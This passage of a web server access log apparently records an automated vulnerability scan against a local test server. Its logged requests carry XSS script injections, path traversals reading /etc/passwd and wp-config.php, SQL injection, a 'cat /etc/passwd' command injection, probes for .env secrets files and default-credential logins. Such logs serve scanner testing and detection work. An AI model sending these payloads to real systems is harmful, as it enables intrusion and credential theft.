"http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homepage.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.221","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%00/example.com/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.006","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999))) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenario/admin/welcome.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /script/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /header.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"cmd=cat /etc/passwd\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.221","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms5.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/admin/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /artifactory/ui/repodata?deploy=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.230","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET \x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jasperserver/login.html?error=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.237","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.078","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /footer.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms6.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /language/lang HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0A/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.prod.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=admin&password=admin&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jasperserver-pro/login.html?error=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms7.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forums/search/z--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hue&password=hue&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/users?username=anonymous HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 